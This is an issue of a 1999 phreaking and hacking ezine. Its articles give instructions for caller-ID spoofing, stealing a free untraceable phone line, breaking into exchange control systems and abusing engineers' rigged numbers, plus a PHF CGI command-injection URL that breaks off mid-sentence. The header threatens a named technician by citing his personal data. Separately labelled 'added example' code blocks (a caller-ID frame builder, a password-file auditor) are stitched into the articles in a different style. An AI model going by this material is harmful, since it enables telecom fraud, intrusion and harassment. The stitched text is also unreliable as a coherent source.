F41th Issue III [April 1999]
D4RKCYDE tHE cOLLECT1VE
darkcyde.8m.com
#darkcyde EfNet.

Contents:

--> Editorial. By hybrid <-----Ooo---
--> CLID Faking. By TheDohBoy <-----Ooo---
--> Fone Technologies Of The New Millennium. By TheDohBoy <-----Ooo---
--> Local Exchange Phreaking. By TheDohBoy <-----Ooo---
--> How Brakis Got A Phree Fone Line. By TheDohBoy <-----Ooo---
--> Installing Linux, how to get it werking. By Bodie <-----Ooo---
--> Overview of some common exploits. By Bodie <-----Ooo---
--> The ShivaLanRover System (@ Userid:) By hybrid <-----Ooo---
--> How to be 3l337 in 10 Easy Steps. By Force <-----Ooo---
--> BT Network Tones and Announcements. By Force <-----Ooo---
--> UK Hand Scan of O8OO 919. By Force <-----Ooo---
--> The SS7 telephony protocol. By hybrid <-----Ooo---

" Richard, CO, how can I help you? "

" Hi, this is Mike up in network administration. Just calling to confirm the problem with the network maintenance on stack 82 of your router..... "

" Yes, the problem was fixed about 30 minutes ago, apparently there was a problem with the SMPS..... "

" Sure.. listen, we've set up a routine output port on 512 XXX XXXX, emitting 300 Hz every 12 ms, can you check that the line is still functioning?... "

" No, it appears to be a standard line.. "

" OK Richard, we'll set another one up in about 15 minutes, in the mean time terminate the line and I'll call you back soon to confirm the stack emitter. "

" No problem, I'll reset the ASP... "

...... 512 XXX XXXX...
" Where' sorry, the number you have called has been disconnected, no further information is available about this number " ... ... (bye bye) ---(OOooOO)-------------------------------------------------------------(OOo- ---(OOooOO)---[supreame f41th diplomatic editor in chief]----[hybrid]---(OOo- ---(OOooOO)---["find me on the PSTN bitch"]----[th0rn@coldmail.com]-----(OOo- ---(OOooOO)---[el8 minister of foreign espionage]------------[downt1me]-(OOo- ---(OOooOO)---["..__... _ ...__.."]--[downtime@webcrunchers.com]--------(OOo- ---(OOooOO)---[crack cocaine p1mp]---------------------------[alph4vax]-(OOo- ---(OOooOO)---["i be the king of buffer overflow"]----------------------(OOo- ---(OOooOO)---[supreame master of beaste boy qoutes]---------[force]----(OOo- ---(OOooOO)---["i jumped outside with my walkman on..."]----------------(OOo- ---(OOooOO)---[bagpipe player, and hagis master]-------------[doh-boy]--(OOo- ---(OOooOO)---["bollocks"]----------------------------------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- ---(OOooOO)---[elf]--[tonekilla]--[mortis]--[bishopof_hell]--[zomba]----(OOo- ---(OOooOO)---[digital_fokus]--[s1nt4x]--[angel]--[mistress]--[lowtek]--(OOo- ---(OOooOO)---[digiphreak]----------[darkcyde.8m.com]-------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- ---(Oo)----[elite]: telnet/ftp: fedworld.gov, even more elite: ch1ckie. Yugoslavian h4x0rz & h4x-wh0r3z. Beaste boyz, blur 13. Guano Apes 'lords of the boards'.. ---(Oo)----[lame]: people who find it amusing to live out their pointless existance taking over irc channels. PLUK. mrsp00n. AT&T conf lamers. Mr Clinton of the wh0re house. Propoganda and patrioctic Bill clinton speaches, not forgeting Mr Blair. lamer still: PBX whorez who call themselves phreaks. 
Lame as shit: 'cooldave' ... cooldave is one of the Latitude techs who maintain MeetingPlace confs. Don't fuck with us bitch, we got your land line number, registration plates, SS number, family medical history, we even know the brand of your fucking toothbrush.

---(OOooOO)--------Editorial--------------------------------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-

f41th has finally begun to take off. When we first came up with the idea of producing an ezine we never thought we would get to issue 3, but now we intend to keep going. The idea of f41th is to create an ezine that is aimed at the American as well as the UK h/p scene. f41th is not intended to be a raw information resource, but is supposed to be entertaining to read at the same time. We still need more people to submit articles for f41th, so if there is anyone out there who wishes to have an article appear in our zine, just email anything to me or any of the d4rkcyde members. I can be emailed at many addresses, but mainly th0rn@coldmail.com. The d4rkcyde website is still undergoing maintenance, and we hope it will be back up and running properly soon; to visit our site go to darkcyde.8m.com.

The other day someone called f41th a 'wanna-be' zine. I'd like to say we are not trying to be like anyone, we are just producing a zine that is useful to both UK and US audiences. Apart from that comment, we have had quite a lot of good feedback from various people; I'd like to say werd to everyone who has commented on the zine with a more positive flavour. Anyways, that's my short editorial over, hope you enjoy f41th 3, WERD.
---(OOooOO)--------cLID Faking------------------------------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-

OK, in this article I'm going to cover the basics of CLID (Calling Line IDentification) and how it affects the humble phreak.

CLID Is Different From ANI!!!

A lot of people get confused about the difference between these. ANI is the age-old identification method that only your local exchange has direct access to: the exchange knows which line circuit went off-hook, so it knows "who's making a call right now" without being told by anyone. Anyone outside your exchange does not have that knowledge and, unless the number is passed along in the inter-exchange signalling, would have to "trace" the path of the call back through a maze of trunk lines.

For the local exchange, the loops are grouped into "pools" of numbers. Say your number was 123456 (for a start you're lucky to have such a memorable number!); how does the exchange work out your number? The main "pool" you are part of is the 1 pool, which consists of all numbers beginning with 1 in the exchange. This then splits into sub-pools like 10, 11, 12, and so on, and after going through six sub-pools your unique number is reached. This is how 175 reads out your number (on System X), and it is also why dialling 141 before 175 has no effect: the readout comes from the exchange's own line record, not from any number sent along with the call.

CLID is digital information (derived from the exchange's own knowledge of the calling line) which is sent from exchange to exchange in the call signalling, and occasionally on to subscribers who have the CLID service. It can be withheld by dialling 141 in the UK, or by using star services in the US. 17070's number readout works from the CLID, which is why withholding it leaves 17070 with nothing to read.

How can I stop ANI going out on normal calls?

The method of diverting (just getting an op to connect you to the number) gets rid of both ANI and CLID from the called party's point of view. The ANI disappears completely, and the CLID passed onward is what is known as the generic packet: it says only that the number is unavailable or withheld, and gives away nothing about you.

ANI and call logging.

Call logging is done at your exchange and shows all the numbers you have dialled.
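A quick look at what that CLID information actually is on the wire, as an added example that is not part of TheDohBoy's article (the call-logging point continues below). Caller-display units take a short burst of FSK modem data in the Bellcore/ETSI MDMF layout: a 0x80 message type, a length byte, type/length/value parameters (date and time, calling number, name, or a "number withheld" marker) and a one-byte checksum. The code below builds such a message, decodes it the way a display unit does, and shows the asynchronous serial framing (one start bit, eight data bits LSB-first, one stop bit) that the FSK modem hands to the decoder. The number, name and date in it are made up; the layout is the standard one.

```python
"""Build and decode a CLI display message in MDMF (Multiple Data Message
Format), the layout caller-display units in the UK and US decode.

Added example, not from the article.  The field layout (0x80 message type,
type/length/value parameters, two's-complement checksum) is the standard
one; the number, name and date used below are constructed."""
from typing import Dict, List, Optional

MDMF_CALL_SETUP = 0x80   # message type: call set-up, multiple data message format
P_DATE_TIME = 0x01       # value: 8 ASCII digits, MMDDHHMM
P_CALLING_NUMBER = 0x02  # value: ASCII digits
P_NUMBER_ABSENT = 0x04   # value: b"P" (withheld/private) or b"O" (unavailable)
P_CALLING_NAME = 0x07    # value: ASCII text


def _param(ptype: int, value: bytes) -> bytes:
    """One type/length/value parameter."""
    if len(value) > 255:
        raise ValueError("parameter value too long")
    return bytes([ptype, len(value)]) + value


def checksum(body: bytes) -> int:
    """Two's complement of the modulo-256 sum, so the whole frame sums to 0."""
    return (-sum(body)) & 0xFF


def build_mdmf(date_time: str, number: Optional[str], name: Optional[str] = None) -> bytes:
    """Assemble a call set-up message.  number=None sends the 'withheld' marker
    that makes a unit display 'Number withheld' instead of digits."""
    params = _param(P_DATE_TIME, date_time.encode("ascii"))
    if number is None:
        params += _param(P_NUMBER_ABSENT, b"P")
    else:
        params += _param(P_CALLING_NUMBER, number.encode("ascii"))
    if name:
        params += _param(P_CALLING_NAME, name.encode("ascii"))
    body = bytes([MDMF_CALL_SETUP, len(params)]) + params
    return body + bytes([checksum(body)])


def parse_mdmf(frame: bytes) -> Dict[int, str]:
    """Decode a frame the way a display unit does.  Note what gets checked:
    structure and checksum only.  Nothing here can tell data sent by the
    exchange apart from data sent down the line by the far end of the call."""
    if len(frame) < 3 or frame[0] != MDMF_CALL_SETUP:
        raise ValueError("not an MDMF call set-up message")
    length = frame[1]
    if len(frame) != length + 3:
        raise ValueError("length byte does not match frame size")
    if sum(frame) & 0xFF != 0:
        raise ValueError("checksum failure")
    params: Dict[int, str] = {}
    i = 2
    while i < 2 + length:
        ptype, plen = frame[i], frame[i + 1]
        value = frame[i + 2:i + 2 + plen]
        if len(value) != plen:
            raise ValueError("truncated parameter")
        params[ptype] = value.decode("ascii")
        i += 2 + plen
    return params


def is_valid_frame(frame: bytes) -> bool:
    """True if a display unit would accept the frame."""
    try:
        parse_mdmf(frame)
        return True
    except ValueError:
        return False


def frame_to_bits(frame: bytes) -> List[int]:
    """Serial framing the FSK demodulator expects for every byte:
    one start bit (0), eight data bits LSB first, one stop bit (1)."""
    bits: List[int] = []
    for byte in frame:
        bits.append(0)
        bits.extend((byte >> k) & 1 for k in range(8))
        bits.append(1)
    return bits


if __name__ == "__main__":
    frame = build_mdmf("04011230", "01234567890", "D4RKCYDE")   # constructed values
    print(frame.hex())
    print(parse_mdmf(frame))
    print(len(frame_to_bits(frame)), "bits on the line")
```

The point the decoder makes: the only integrity check a unit performs is the checksum. There is no signature and nothing that ties the digits to what the network actually carried in its signalling, so whoever can put a valid FSK burst on the line controls the display, which is exactly what the faking method in this article relies on.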
The call log catches you even if you dialled 141 first. Diverting only shows that you made an operator call, and since loads of people are dialling the op at any one time, this is a good solution to that problem.

OK, I can get rid of all my ANI/CLID/Caller Log info, but can I fake my CLID so that I look like someone else?

The good news is that you can, with a little knowledge of the CLID protocol and maybe some programming knowledge. What you need is a program that can transmit CLID information in the form that CLID units (the boxes that show residential/business customers the number before they pick up) expect. These units work by listening on the line for an alert signal from the exchange (a line reversal followed by a short tone burst) and then decoding a short burst of FSK modem data carrying the number, all before the fone rings. The whole thing takes a fraction of a second, and the unit checks nothing beyond a simple checksum: it has no way of telling whether the data came from the exchange or from the other end of the call. So all that is required is such a program, and the following method:

1) Divert through an op to call the number you wish (or dial 141 at least)
2) Wait for pick-up, and when they go off-hook, send the CLID packet
3) Do what you want

How this looks at their end is as follows:

1) The fone rings and the CLID unit says "Operator call" or "Number withheld". They pick up the receiver (and possibly hear a "cheep", which is your data burst)
2) The unit then shows the fake number on its screen.

This is perfect for 0800 numbers, which tend to have CLID units. It's also good for ISPs, and even certain telephone companies!!

Two caveats. The trick only works on a unit that will decode FSK after the call has been answered; a unit that only listens between the alert signal and the first ring will ignore it. And it only changes what the unit displays, not what the network recorded: 1471 won't be fooled, but if you've done it right there will be no number there anyway.

That's all I can think of for now; maybe we'll see a good proggie spring up to help us soon!

---(OOooOO)--------Phone Technologies of the new millennium-------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-

Pretty snappy title huh.. Well, in this article I hope to focus on technologies which are yet to make their way to the end user.
I'll be taking the point of view of a phreaker who wants to know the possible loopholes in these technologies.

Wavelength Division Multiplexing.

A really great technology which could cut the cost of calling to almost nothing. Everyday multiplexing is done using TDM (Time Division Multiplexing). This technique lets multiple subscriber-to-subscriber calls share the same trunk line by giving each call a time slot in turn. An illustration of how this works follows:

Call 1: (First in line)  -------------\
Call 2: (Second in line) ---------------- Single trunk line holding *1* call at any instant
Call 3: (Third in line)  -------------/

Realistically the line numbers would not have a one-to-one correspondence with their order in the queue; the slots are allocated by an algorithm on the switching equipment. The usage of the network is never 100%, so the loss in quality of the calls is *very* minimal.

As one can see, this method has its problems. There is an upper bound on the call capacity, set by the sampling rate of the sound levels at the subscriber's fone and the number of subscribers using the line at any one time. The upper limit varies directly (assuming the number of callers at the peak is roughly constant) with the sampling rate. One way to overcome this is to use separate wavelengths for separate calls (or TDM lines). This means each WDM line can carry a multiple of the equivalent TDM lines, and so the cost to the end user should vary directly with the cost of TDM and inversely with the number of TDM lines carried per WDM line. Local calls (in the UK) are already 1p per minute for a standard line, so even a small WDM/TDM ratio could see calls becoming *extremely* cheap. The fone will become just another utility which can be left on all day (much as electricity is now).

There are two main pitfalls I can think of with this technology. Firstly there is the problem of interference from other calls.
This effect will be much the same as radio interference, causing call quality to drop. A possible solution would be to allocate wavelengths based on prime numbers, so that no carrier is a harmonic of any other signal in the fibre, stopping interference almost completely. Phases could also be allocated randomly to prevent interference. Another pitfall is the limited spectrum available. Because of the photoelectric effect, most of the signals will have to be sent (along fibre optic cable) at a wavelength particular to the materials used in the detectors. If digitally encoded, the transfer rate (although HUGE) will be limited by the switching times of the semiconductor equipment at the other end.

An advantage for the telcos is that conference call facilities can be made just by "tuning" three calls into one wavelength on a specific line. No doubt this could be taken advantage of to listen in on others' conversations, step up trunks, etc. I would also expect inter-office signalling to travel on the same fibres as consumer calls. Perhaps if telcos are thick enough to put it at the lower end (where the density of calls is greater) it can be "tapped" by phreaks. I think that covers most of what phreaks need to know about WDM.

Telefony Over The National Grid.

Another high-bandwidth technology (which may even incorporate the above system) which could see the cost of calling drop. Personally I doubt this will ever get off the ground. BT/AT+T will see their profits at risk and will try anything to stop this technology taking hold. Basically how this works is to send signals over the electricity distribution system. A pretty good idea, especially as the system can provide high bandwidth over wiring already present in people's homes. One obvious advantage to the telcos involved would be that it would stop beige boxers :> (clip clip, ring ring, fry fry!!!!) Up to subscriber level the system is bound to be similar in structure to the PSTN, i.e. sub-units acting as exchanges etc.
It will look quite similar to the normal fone network.

IP Telefony.

Notable in that it already exists. To check out a good example go to www.net2phone.com and download the software. That gives you 1-800 access and a complimentary bundle of minutes. This is the use of the internet to conduct voice telefony. It can be thought of as a gateway between the internet and the PSTN (although some applications of this only go net-to-net). This makes calling internationally as cheap as a local call to your ISP, so that can't be bad. Things like NetMeeting and Netscape Conference/CoolTalk are already in use and are free. BT already feels threatened and is ploughing a lot of money into this technology in order to save its market share. As for call quality, I think it's about as good as a digital mobile driving down the M1 at 100mph, in that the volume varies considerably. This is due to the packet technology in use on the net: the voice is chopped into packets, and when they arrive late or out of order the sound suffers. Good news for hackers is that the gateway servers can probably be hacked and used to route calls through. Also, AT+T are providing an IP conference call system (free for ten minutes during the Superbowl). This will allow you to put in numbers and then call them all at once using your computer. Check around on the net for such things, they are growing steadily!

Videoconferencing.

Aaaahh..... Takes me back to when I was at a BT exhibition in 96/97 when they had their videofones on display. Of course they had two set up to allow two people to talk on them. What they forgot was that if you hung up you could dial out on them. So if BT can be that stupid, well, who knows! Anyhoo, back to videofones. Businesses are increasingly using these as they provide an ideal solution to the problems of teleconferencing, i.e. talking over someone else. No doubt as the service expands in bandwidth TV and the net may integrate into this service, providing a one-stop comms shop as it were. No doubt BT would charge a premium for this kind of thing!!!
GPS Cellfones

Dangerous technology for the phreaker if this becomes de facto. Think of an operator being able to trace not only your number but *exactly* where you are!!! Very bad stuff.

Free Local Calls In The UK

Finally in 2000 (approx. when OFTEL takes the restrictions off BT) we can take a leaf from the book of our American phriends and learn how to step up trunks and so on. Local PBX hacking will become normal and the appeal of Meridian systems may wane slightly. Perhaps a way can be found to busy out certain routes and make the switching systems hand you off up the trunk; a few key presses later and you can make a free call anywhere!!! The weak link there is trying to block certain paths through the system. I'm looking forward to this (he says, rubbing his hands together).

---(OOooOO)--------Local eXchange Phreaking-----------------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-

Engineer Line Testing
---------------------
This is info I stole from a guide sheet for BT engineers. It basically gives them a list of numbers which they can use for testing lines, recording line activity, etc. This can come in useful for the phreak intent on controlling certain aspects of someone's line. Some of this may have been covered in other articles, but I think the stuff on ASUs is relatively new.

Testing On System X
-------------------
Subscriber Automatic Line Test (SALT)

175 - Voice read-out of number, follow prompts
  01 - Dial test
  02 - Power down line (shuts the line down for 3 min, also wipes ANI)
  6  - Partial recall
  7  - Full recall, returns administrative DT
  06 - Power down exchange (I've never seen it happen btw!)
  No response - New DT

Cable Pair Identification

176 - followed by the full area code and number of the line on which the tone is to be placed. You should get NU tone; this means the tone was successfully placed on the line.
Testing On System Y
-------------------
Subscriber Automatic Line Test

175 - Fast engaged tone / interrupted dial tone. Commands same as System X.

BT Linetest Facility

This is a doozy of a number. It was covered in last month's issue of SWAT so I am technically repeating this, but........

17070 - Reads out your number (if no CLI, no readout), then: 1 for ringback, 2 for quiet line, 3 for fast test, 4 for fast trans, or clear down.
  1 - Rings back upon clear down
  2 - Gives quiet line for testing LN
  3 - Gives ringback line test, line test, cable pair identification etc.
  4 - Recording of test results
  Clear Down = Hang Up

ASUs
----
OK, so you're asking what the hell an ASU is. It's basically the main control point for that local area code. Not all exchanges keep these in the range I am specifying, but do some scanning and you should find them. ASUs allow switching engineers to control the main features of the switch from a remote fone. I don't have to spell out what this means for the phreak. ASUs in most exchanges are found at 9999. They should present you with a message requesting a PIN. You may need to sleep with a BT employee to get one of these. You could war-dial one, but for God's sake NOT FROM YOUR HOME FONE. Once inside you can check the volume of calls coming through the exchange, perform housekeeping tasks on the switch, mess around with lines, you name it. Hack one of these and you will become 31337.

An interesting point about these numbers is that they automatically step you up to STD (trunk) level. This means if you dial your local ASU you will be stepped up to national level. Find a break signal like the one on 175 (after ringback, flash the hook) and you can mess around on national lines for local rates.

Fiddles
-------
These are fixes put into the circuit by fraudulent engineers wishing to exploit their position. They hide these in the 17x range and they are unique to each exchange, so there are only 10 numbers to look through.
They are usually hidden behind NU tones or "sorry........" messages. Mess around on each number till you find a fiddle. You should be able to make free calls off these, or possibly access looped lines. Either way, corruption in a powerful organisation is inevitable, ABUSE IT. If you find a fiddle and want to use it outwith your own exchange you're going to have to either find a PBX in your area in the 0800 range or hook up a black/beige/gold box combo and dial through that.

CSSs
----
The Holy Grail of numbers. If you find this you will become more 'leet than Captain Crunch, Whistlin' Joe, Onkel Deitmeyer and Alexander Graham Bell put together. You can do SHIT LOADS with this number. You can even check up on the line records of any number in that area and see the caller log. There are dial-ups on the PSTN and over the net through a special BT server. I also believe there are dial-ups on PSS/Featurenet. To find a CSS you may have to know a BT employee, or if you don't it'll take LOADS of scanning, hacking, and heart attacks over your local exchange. Scanning in your local prefix is always a good bet.

Exchange Dial-Ups
-----------------
Your local exchange WILL have a modem dial-up on the PSTN or PSS/Featurenet. Once you have found this you can access fun things. Tracing calls is rather easy from these. Changing line status and so on is also easy.

Weeuurd Stuff!!!
----------------
I found a severely weird number on a 373 scan I did myself. It's 0800373983. It's exactly the same as 17070!!! What's weird is that I can dial it from non-BT fones (including my Orange JustTalk) and use it to test lines (great for beiging). It'll probably die now that it's in the public domain, but hey! why not share.

Wrap up
-------
That's all I know on the subject of local exchange phreaking at the moment.
---(OOooOO)--------How Brakis got a free fone line----------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-

What is documented here is the result of a group of four phreaks fucking about with a mate's fone line. The techniques enclosed are not only accessible to the 'leet; anyone can use them. Basically, this is how we got Brakis a phree, untraceable fone line.

Brakis *used* to be with BT but hated them so much that he moved to a competitor (no names mentioned). Naturally, when he switched, BT came and took his fone line off. I might mention of course that he did have two BT lines, and now has one (legit) BT line which is a business line.

Well, when we started off we were on the jolly side of drunk and had the idea of beiging Brakis' old line. ODC had the great idea of checking the line length using 17070. He did this from my Orange Mot. c520 (I have a 17070 dial-up, I ain't making it public, mail me if you want it). The test came back and the line length was 2.4km. This was odd, because the distance from Brakis' house to the local BT exchange was about 2.4km!!! So ODC reckoned that the line was terminated INSIDE BRAKIS' HOUSE!!!

After fixing the second line (we screwed it up a bit), we hooked our beiges onto the terminated wire pair. THERE WAS A DIAL TONE!!! We tried dialling a few 0800s but got nowhere, then we dialled 100 and got through!!! We could get the op to connect us to wherever we wanted. We then called it on the cellfone to check to see if it could get a call-back trace. We got: "Sorry, the number you have dialled is not available". There was no CLI on the line, it couldn't get traced, and it was FREE. It's the perfect line!!!

You can follow more or less what we did for yourself if you want a fone line for phree. Just use 17070 to test your old lines; if BT were as stupid as they were in our case, you can get yourself a line. Cheers!!!
---(OOooOO)--------Linux, how to get it werking-------------------------(OOo-
---(OOooOO)--------by Bodie---------------------------------------------(OOo-
---(OOooOO)--------bodi3@usa.net----------------------------------------(OOo-

I don't care what anyone says, you can't be a hacker unless you have some form of unix on your machine; how are ya gunna do anything with the iron grip of windoze on your computer? This file will describe how to get linux on your machine and get up and running.

Most people now want to dual boot with both windows and linux on their system. This is what I use, because no matter what people say there are programs that can only be run in windoze and some of these can be extremely useful. If you want to do this, take my advice and ignore all the windows documentation: you need to install windows first and then install linux after it. The reason for this is that windows doesn't play well with others (it doesn't really play well with anything else full stop, but that's another story).

**************
*****NOTE*****
Installations of linux vary widely in their setup procedure; make sure you read the manual first if you have any problems. If that doesn't solve it, feel free to mail me and I'll see what I can do to help.
**************

After you have done this you will need a copy of Partition Magic. I think this is shareware now, but if you can't find a copy, mail me and I'll get one to ya. Once you have Partition Magic installed, you will need to set up 2 partitions for linux: one will be a swap partition and the other will be the main linux partition. Many people have different opinions about how big the swap partition should be, but I have one of about 100Mb and that does me fine. The main partition should be as large as you can make it. The important thing at this stage is to leave both partitions unformatted.
Partition Magic doesn't currently have support for linux partitions, and you will be able to format them later during the installation of linux.

The next thing you will need to do is make a boot disk. If you bought a copy of linux it is likely that boot disks came with it; if you got a copied version or got it any other way, you won't have a boot disk. Creating a boot disk is different on each version of linux; normally there will be a utility that you can run from windows or dos that will allow you to create one easily (look under the directory /dosutils or something similarly named; if you have any problems mail me and I'll see what I can do). Once you have done this you will need to reboot the machine with the boot disk in the drive (make sure you have floppy booting enabled in the BIOS, else this won't work) and the linux CD in the drive. You will now boot into linux.

**************
**IMPORTANT***
Make sure you have the full spec of all your hardware with you at this point
**************

This is where each different version of linux has a different installation procedure. I have installed Slackware, Red Hat and SuSE and they have all had wildly different user interfaces for the installation procedure. Basically all you have to do at this stage is tell the system what partitions you have on your hard drive, which one is the swap partition and which one will be the main partition for linux; then it will format both the swap and main partitions for the linux file system. You can also access DOS drives from linux (something which is not easy to do the other way round from windoze); you just have to tell linux where to find the partitions.

**************
*****NOTE*****
The hard drive labelling is very different from the labelling used in windows. All linux devices appear as files within a directory called '/dev'. The first partition on the primary hard drive is labelled '/dev/hda1'. The second partition is labelled '/dev/hda2' and so on.
If you have a second hard drive it is labelled '/dev/hdb'. This may seem strange to anyone who has been using DOS, but it means a linux system has what is called a single root file system: there is one top-level directory called '/' and every other directory hangs below it. Hard drives are accessed by mounting them on a directory. This creates a link between the device in /dev and the directory the drive is mounted on. You must specify the directory where each partition will be mounted at install time; after that, accessing a separate drive is just like accessing another directory.
**************

Next you will probably see a list of programs that you can install if you want to. What you want to install is up to you, but you may want to install a lot of programming tools so you can build other packages that may require libraries contained in these packages. Next just sit back, make a cup of tea and watch it install. Reboot and you've got a linux system up and running.... Congratulations :)

Once you have done this take a look around the file system and try out some commands. Some of the main commands in linux are:

cd    - same as DOS, change directory
mv    - Move a file (there is no separate rename command like the one in DOS, so mv does that job too)
cp    - Copies a file
ls    - Lists the contents of a directory (similar to dir in DOS)
more  - A pager: shows whatever input it is given one screen at a time, a very useful program
crypt - Encrypts a file with a password. Be careful what you trust it with: crypt(1) implements a rotor cipher that has been publicly broken since the mid-80s, so it will keep out a casual sysadmin, not a determined one. Anything genuinely sensitive on a foreign system, or even your own, should be encrypted with something stronger, such as PGP.

I could spend my whole life explaining all the various commands available, but I'm not gunna do that, 'cus you can look them up in a book if you want to use them.

One more interesting feature of linux is pipes and redirection. This allows you to send the output of one program directly into another.
One of the most common examples of this is:

    ls | more

This uses the '|' character (a pipe) to send the output of ls into more. This is often used when there is a long directory listing: ls displays the output so fast that no one could read it, but more lets you read it one screen at a time. The other redirection characters are '>', which writes the output to a file (creating it, or overwriting it if it already exists), and '>>', which adds the output to the end of a file that already exists.

As I said earlier, the file system in linux is very different from the windows file system. A simplified version of the file system is shown here:

                / (ROOT)
                   |
       -------------------------
       |        |       |      |
     /bin    /users   /etc   /dev
       |        |       |      |
      ...      ...     ...    ...

There may be many other directories as well, but these are the main ones.

The '/bin' directory contains the executable programs that are available to users of the system. Sometimes a link to another location is put in here so the file is runnable from the /bin directory but is actually stored somewhere else on the system. Programs are also stored under the '/usr' directory.

The '/users' directory (on most systems this is '/home') is used for storing user areas. This is where individual users store all their files. Unless you actually need the root account, it is a good idea to work as a normal user: it avoids accidental damage to system files and, if you are on the net, it limits what an attacker gets if they break into something you are running.

The '/etc' directory is where all the config files for the system are stored. This directory contains the passwd file (and, on systems that use shadow passwords, the shadow file, which holds the password hashes and is readable only by root). It also holds the settings that the system and various programs read when they start.

The '/dev' directory is where all the devices the system uses are represented as files. This includes the mouse, keyboard, hard drives and lots of other things. The basic idea is that when a device has input for the computer, the data appears in these files and the system reads it from there.
When data has to go out to a device, it is written to one of these files and the system sends it on to the device. This may seem a complex way of doing things, but in actual fact it makes it a lot easier for programmers to perform operations on various devices, as they only have to access a file rather than a device. (If ya don't understand this bit it isn't important for the moment.) There may be several other directories under the root, but these are the main ones that you will have to worry about for the moment.

The next thing you will have to do is set up X Windows, the graphical interface for linux. The thing about X is that there are many different desktop environments, unlike windoze where you just have the standard environment. This is good because you can decide on the style that suits you best. Personally I prefer KDE at the moment, but there are different ones coming out all the time. To set up X you will need to have the full specs of your monitor and video card ready. There are 2 ways to set up X. One is a graphical way that is quick and easy but may not work in some cases (I had hell with this). To run this, at the command line type:

    XF86Setup

Or to run a command line setup interface type:

    xf86config

You will then be presented with the usual menus that ask you about your hardware. Get that up and running and you SHOULD have a decent working version of X. A lot of things can go wrong here though; most people have problems of some sort. The best thing to do if you have a problem is to go back to the config programs and make sure you gave the right specs for your hardware. Failing that you could try editing the '/etc/XF86Config' file, although doing this is quite complicated and I would suggest reading up on how to do it first (or just wing it like most people :) ).

Now you should have a fully working linux system installed, well done.
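Added example (mine, not Bodie's): the passwd and shadow files mentioned under '/etc' are the first thing worth checking once the box is installed, and the first thing an intruder goes for. The script below parses entries in the standard seven-field passwd layout and the shadow layout and flags the conditions that matter: an empty password field, a real hash left in the world-readable passwd file, a second UID 0 account, a user with no shadow entry, and an empty shadow hash. The sample entries are constructed and the hashes are not real; the file formats are the real ones.

```python
"""Audit passwd/shadow-style entries for the classic mistakes.

Added example, not from the article.  SAMPLE_PASSWD and SAMPLE_SHADOW are
constructed data in the real file formats; the hashes are placeholders."""
from typing import Dict, List, Tuple

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bodie:x:1000:1000:Bodie:/home/bodie:/bin/bash
toor:x:0:0:second root:/root:/bin/sh
guest::1001:1001:Guest:/home/guest:/bin/bash
legacy:$1$saltsalt$notarealhash0123456789ab:1002:1002:Legacy:/home/legacy:/bin/bash
orphan:x:1003:1003:Orphan:/home/orphan:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$notarealhashA:10700:0:99999:7:::
bodie:$6$saltsalt$notarealhashB:10700:0:99999:7:::
toor::10700:0:99999:7:::
legacy:*:10700:0:99999:7:::
"""

Finding = Tuple[str, str]   # (username, issue code)


def parse_colon_file(text: str) -> List[List[str]]:
    """Split a passwd/shadow-style file into rows of fields, skipping blank lines."""
    return [line.split(":") for line in text.splitlines() if line.strip()]


def audit(passwd_text: str, shadow_text: str = "") -> List[Finding]:
    """Return (user, issue) pairs for every risky entry, in file order."""
    findings: List[Finding] = []

    shadow: Dict[str, str] = {}
    for row in parse_colon_file(shadow_text):
        if len(row) >= 2:
            shadow[row[0]] = row[1]          # second field is the hash

    seen_uids: Dict[str, str] = {}
    for row in parse_colon_file(passwd_text):
        if len(row) != 7:
            findings.append((row[0] if row else "?", "MALFORMED_ENTRY"))
            continue
        user, pwfield, uid, _gid, _gecos, _home, _shell = row

        # An empty second field means "no password": login just by typing the name.
        if pwfield == "":
            findings.append((user, "EMPTY_PASSWORD"))
        # 'x' means "look in shadow"; '*' and '!' mean locked.  Anything else is a
        # real hash sitting in a world-readable file, ready for a cracker.
        elif pwfield not in ("x", "*", "!"):
            findings.append((user, "UNSHADOWED_HASH"))
        elif pwfield == "x":
            if user not in shadow:
                findings.append((user, "NO_SHADOW_ENTRY"))
            elif shadow[user] == "":
                findings.append((user, "EMPTY_SHADOW_HASH"))

        # Any UID 0 account is root, whatever it is called.
        if uid == "0" and user != "root":
            findings.append((user, "EXTRA_UID0"))
        if uid != "0" and uid in seen_uids:
            findings.append((user, "DUPLICATE_UID"))
        seen_uids.setdefault(uid, user)

    return findings


if __name__ == "__main__":
    for user, issue in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{user:10s} {issue}")
```

Run against real files with `audit(open("/etc/passwd").read(), open("/etc/shadow").read())` as root; the UNSHADOWED_HASH case is the one that turns a read-only hole like the phf bug described later in this issue into a password-cracking session.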
There is a lot more that I haven't mentioned in this file, and the chances are you will have to read lots of other files to get various things working or to learn about other programs. Linux is an amazing thing if you make the most of it and ask what it can do rather than what it can't do. Welcome to the new world.

----------

Greetz

Anyone who can get me a pre-release copy of Star Wars: I'll pay any money - pleez

The usual bunch of people who know I appreciate them :)

---(OOooOO)--------Overview of common Exploits--------------------------(OOo-
---(OOooOO)--------by Bodie---------------------------------------------(OOo-
---(OOooOO)--------bodi3@usa.net----------------------------------------(OOo-

This file is a basic explanation of some of the methods of exploiting systems. It is not a full list; there are many exploits and to list them all would take up my whole hard disk, but these are the most common.

1) PHF

Laugh if you like, but it's surprising to see how often this still works. Although the number of vulnerable systems is very small now and getting smaller by the day, it still saves a lot of time over some of the other exploits. This exploit is even usable by windoze script kiddies. It works because of a bug in a commonly used CGI script called PHF, which allows any remote user to see any file on the system and even execute commands :)

To use it open up a web browser (if you wanna be really 31337 you can telnet to port 80, but why make life hard for yourself) and go to:

  http://www.vulnerable.com/cgi-bin/phf?Qalias=x%0a[command]

where [command] is the command you want to execute. A command you can execute is:

